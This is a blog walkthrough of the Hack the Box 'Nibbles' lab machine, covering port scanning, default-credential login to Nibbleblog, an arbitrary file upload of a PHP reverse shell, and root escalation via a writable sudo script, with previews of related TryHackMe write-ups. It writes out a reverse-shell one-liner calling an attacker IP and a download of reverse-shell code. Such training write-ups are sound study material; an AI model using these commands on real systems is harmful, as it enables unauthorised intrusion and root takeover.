Hack the Box - Nibbles - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Nibbles machine hosted at https://hackthebox.eu . For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Nibbles machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.99.239.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.99.239


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -sV -T4 -p22,80 10.129.99.239


The target has a web service running on port 80. Let's visit that page now:

http://10.129.99.239/


Not much here, but let's take a look at the page's source:

view-source:http://10.129.99.239/


This source hints at a directory called /nibblesblog. Let's follow up on that:


We've confirmed that there's a blog here. Now that we have a root directory for this website, let's do some directory busting with Gobuster:

gobuster dir -u http://10.129.99.239/nibbleblog/ -w /usr/share/wordlists/dirb/big.txt -r -x php,bak,html,txt,tar -s 200,204,301,302,307,403,401     



We'll be investigating each of these entries eventually, starting with README,

http://10.129.99.239/nibbleblog/README


Here we can confirm the software running the blog, Nibbleblog version 4.0.3. Let's see if Google can give us anything:

Google search string: nibbleblog 4.0.3 exploit




Finding a Way In

This exploit requires admin access to the blog, access to the upload web directory, and a malicious file for us to upload.

Investigating the /nibbleblog/contents directory eventually leads us to this page:

http://10.129.99.239/nibbleblog/content/private/plugins/my_image


This is likely the directory where our file will be stored after we upload it. Now to visit the admin.php page:

http://10.129.99.239/nibbleblog/admin.php


We try logging in as username: admin, password: nibbles, and it works.

http://10.129.99.239/nibbleblog/admin.php?controller=dashboard&action=view




Before we go through with uploading a file through the web app, let's prepare the PHP file we want to upload, and setup our Netcat listener.  The PHP file we will use can be found here:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Let's download the file to our working directory:

wget -O customPHPrevShell.php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php


Then we'll modify the PHP file to match our attacking system:


Then we setup our Netcat listener:

sudo nc -nlvp 443


Now we can go back to the web app and upload our PHP file:

http:///10.129.99.239/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

Here we click the browse button:


Then select our PHP file and click "Open"


Then, to finish the file upload process, we click the "Save changes" button.


With our file uploaded to the server, we can now go back to the my_image plugin directory to look for our PHP file:

http:///10.129.99.239/nibbleblog/content/private/plugins/my_image


The file was renamed when it was uploaded, but here it is.  Let's access it and open up our reverse shell:

http:///10.129.99.239/nibbleblog/content/private/plugins/my_image/image.php



This PHP reverse shell has done a little work for us, and we know our user's name and the OS version.

Capturing the User Flag

We'll take this opportunity to collect the system's User flag.  User flags on Hack the Box Linux are usually located in a user's /home directory.  Let's go get that now:

cat /home/nibbler/user.txt


Prvilege Escalation

Let's see if our user can run any commands as root:

sudo -l


It looks like our user can execute a specific bash script file as root.  Let's take a look at the user's home directory:

cd /home/nibbler/
ls


Now let's unzip this file and see what comes out:

unzip personal.zip


There's the monitor.sh script that the sudo -l output was referring to.  If we can run this script as root, and we can write to this file, then we can setup another Netcat listener on our attacking machine, the write instructions to the script to open a reverse shell to our attacking system.  Since we will run the script as root, the reverse shell that is opened on our attacking system will be a root shell.  First, let's start our second Netcat listener:

sudo nc -nlvp 80


Then we write a reverse shell to the monitor.sh script and execute it with sudo:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.84 80 >/tmp/f" > monitor.sh
sudo ./monitor.sh
whoami



Capturing the Root Flag

The Root flag on Hack the Box Linux systems is usually located in the /root directory.  Let's capture it now:

cat /root/root.txt


Summary

After initial scans, we found that the target's blog software was vulnerable to an arbitrary file upload vulnerability, which we used to establish a foothold on the system.  Once in, we found that our logged in user was able to run a script file as root, which led to us opening a root shell on our attacking system and capturing the objective flag file.

Finish




































































Comments

Post a Comment

Popular posts from this blog

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more